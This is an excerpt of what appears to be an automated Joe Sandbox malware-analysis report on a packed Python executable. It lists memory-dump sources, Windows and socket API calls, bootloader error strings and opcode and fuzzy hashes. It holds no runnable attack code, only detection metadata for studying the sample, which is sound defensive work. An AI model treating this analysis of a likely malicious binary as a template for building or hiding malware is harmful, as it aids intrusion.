• Opcode Fuzzy Hash: 4f2beb27c7ea7289d8515a14bf3cfdd75d59c501fe0f98bb6e87318c8562a854
• Instruction Fuzzy Hash: 9FB17062E08A8182E6218BA9E8043BC77A0FB99BE4F065335DE5D537A1DF3CE5C5C705

Control-flow Graph (function starting at 00007FF8E813746C; rendered as an image with an executed/not-executed block legend, basic-block list not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: AddrFreeInfo$getaddrinfo
• String ID: Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
• API String ID: 2288433384-1074899869
• Opcode ID: 31578e94d28b646b1d124d071274d69e5ee20e598ce9ff2e34f2b354b6e2d7d2
• Instruction ID: 19f137747b07cd749ab0e40c983e2da55c44e02497df50811e43314c9abdc4fe
• Opcode Fuzzy Hash: 31578e94d28b646b1d124d071274d69e5ee20e598ce9ff2e34f2b354b6e2d7d2
• Instruction Fuzzy Hash: 8BC12436A0AB4286EB148FA1E4487BC73A0BB49BC4F024935DE4E93B54DF3CE544C34A

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 55660f7852eeee30d2d639831c2873b2ebe9c995d45b3204146c46c5ee4e8cf5
• Instruction ID: 5b5ed3e474994c15a654b0ec843c4b7f621b2fcb613c033fff18a9adf1a11a26
• Opcode Fuzzy Hash: 55660f7852eeee30d2d639831c2873b2ebe9c995d45b3204146c46c5ee4e8cf5
• Instruction Fuzzy Hash: 9D417C61A0864286FB10FB21A4817B9E3A1EF44788FC445B3EE4D4BB9DDE7CE541C762

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: 750117d0cef1200f284b8f46e1dc9bb692c8931361e04233996456fa0167cff0
• Instruction ID: 62705e2bbc6e83401a42566eb4fc28e506f6df863e2286ddd92be26972ff1290
• Opcode Fuzzy Hash: 750117d0cef1200f284b8f46e1dc9bb692c8931361e04233996456fa0167cff0
• Instruction Fuzzy Hash: AB51D362A0864285F620FB21A4903BAA392FF84798FC44176EE4D477DDEE3CE541C722

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorLast$select
• String ID: timed out
• API String ID: 1043644060-3163636755
• Opcode ID: fc651cffc8d0259b0e914ce5bfbd73a3b3d15b310cc83588944c491bbca2a8c7
• Instruction ID: 5c93ede24b784126b9ba09f7c31205502268de7df16859575198726d9712ad98
• Opcode Fuzzy Hash: fc651cffc8d0259b0e914ce5bfbd73a3b3d15b310cc83588944c491bbca2a8c7
• Instruction Fuzzy Hash: 24418CB1E0DA4286FA655FE1A8443BDA2A1BF45FE5F064130CD4E427A4DF3CF885C60A

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7EAD03804), ref: 00007FF7EAD036E1
• GetLastError.KERNEL32(?,00007FF7EAD03804), ref: 00007FF7EAD036EB
  • Part of subcall function 00007FF7EAD02C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02C9E
  • Part of subcall function 00007FF7EAD02C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02D63
  • Part of subcall function 00007FF7EAD02C50: MessageBoxW.USER32 ref: 00007FF7EAD02D99
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction ID: aa58795fd151d1a2addeb85b119a2229fb7102c7a0d362bdb799c6b4eaf65dcc
• Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
• Instruction Fuzzy Hash: 48217F61B1864241FA20F724E8953FAA756FF88358FC042B3E65D825DDEE3CE505C762

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
• Instruction ID: be7efa2d6ec71f8b965ffb037162accb55d07a8a9701b2b3a91cd888d3e0b722
• Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
• Instruction Fuzzy Hash: A0C1E472A0C68681F761EB3590407BDBB51FBA1B80FD541B3EA4E07799CE7CE4458722

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: setsockopt
• String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
• API String ID: 3981526788-1608436615
• Opcode ID: 32ca9612667a1d97849a044e9fa1363f5e862fb873e08f953f5db1e1b9d64d2d
• Instruction ID: 8e6c30fd53852608f27a2b650e5644d8efce898f780d219070bee2b511c81d70
• Opcode Fuzzy Hash: 32ca9612667a1d97849a044e9fa1363f5e862fb873e08f953f5db1e1b9d64d2d
• Instruction Fuzzy Hash: 39411F32608B86D2EB208FA1E9407AE7361FB89BD4F520532DA9D43B54DF3CD548CB45

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
• Instruction ID: 927f537e46426d2aaace940f905dbf842ef3cc4270607b018656d2f6871e6012
• Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
• Instruction Fuzzy Hash: 2E417121A1CA8691FA21FB20E4943E9A316FF44358FC001B3EA5C4369DEF7CE509C762

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorLast$connect
• String ID: 3'
• API String ID: 375857812-280543908
• Opcode ID: ad6926efe17413235fb0923d8b5cdfad53428c2f0b392e70a2f0e2a8c3016219
• Instruction ID: f159fba161bbdbdcdfd7dcee90c220a65cd0e8bfeab45c12b524cbc3285f89da
• Opcode Fuzzy Hash: ad6926efe17413235fb0923d8b5cdfad53428c2f0b392e70a2f0e2a8c3016219
• Instruction Fuzzy Hash: 5C315C25B08B8286FB608FE6A9443BD6690FF54BE4F024535EE4D93795DF3CE440C60A
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction ID: d7060ce8004206e8843f8309fcbb555d2b867fba51587e4af50d8cc12d3a0944
• Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
• Instruction Fuzzy Hash: 2741A462D1878283F710EB709554369B360FBA43A4F908376E6AC03AD9DF7CA4E08761
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction ID: ecca85b24874862a24e7183fb72d5a99607acda9a7379090796502f01be66a86
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6313520E0810645FA14FB6594913B9AB82EF9178CFC444B7E94E4B2DFDE7CA805C273
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction ID: eec38f99bcf9f54e7f1c3a716ea1f693e33258882375edd9fc26d3db17decd87
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28510561B0924986F728FA7594007BAE381FF64BA4F8A4772DD6C437DDCE3CE5418622
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction ID: 4c2bb2ce44d08f4f13883e68719424bf672e55fff0495f92f2f6dc96292bc4b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1511EF62A08A9281EA20EB25B800269A761EB51FF0F944372EE7D0B7ECCE7CD4508711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1021210092-0
                                                                                                                                                                                                                              • Opcode ID: 9d037e66daaa798c1db8349a0f9e745af233c9881e48aae1d3b5376aec23ea56
                                                                                                                                                                                                                              • Instruction ID: c4f6b5c218138cd70d141fdd60a50347f7280eebec4664d271900c4a1227d846
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d037e66daaa798c1db8349a0f9e745af233c9881e48aae1d3b5376aec23ea56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B014F21B18B4282E7109BB6E94422E73A0FF89BD4F514031EA5E93B64DF3CD495C709
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F906013440closesocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4165350034-0
                                                                                                                                                                                                                              • Opcode ID: 62ca75f0746227e7f5462e3ebb3314c23d0f25c318866796c54010b4c1d505b6
                                                                                                                                                                                                                              • Instruction ID: c48d6182b324ab26af285c4de40c62b34954d2e895f7c365219ba6d24868d84d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62ca75f0746227e7f5462e3ebb3314c23d0f25c318866796c54010b4c1d505b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF01922A18B41C2EA145BE6B5482AC6364BB49BF4F590331DA7E537E0CF3CE896C205
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF7EAD1A9D5,?,?,00000000,00007FF7EAD1AA8A), ref: 00007FF7EAD1ABC6
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7EAD1A9D5,?,?,00000000,00007FF7EAD1AA8A), ref: 00007FF7EAD1ABD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction ID: d78c9e0a33182bb1b0867914edefaabed07851869f2b579fb04d35b1bfafe9fe
• Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction Fuzzy Hash: 5021C661B0C68241FA90F7B195943BD9382DFA4790FC842FBD92E477E9CE7CA4418322
APIs
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                                              • Opcode ID: f75e51da77dfc1082f19fe342fcab0b157519f4804096b52c81e4ca3d592fddb
                                                                                                                                                                                                                              • Instruction ID: ef273ee71972dec6e6a9638c7a26a905475f26c4bda3a3308901f3929aa819d7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f75e51da77dfc1082f19fe342fcab0b157519f4804096b52c81e4ca3d592fddb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24E012F2A14A8582DB289BA6E44426863A0F719FF4F245721CA381B3D0DE28D9E1C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
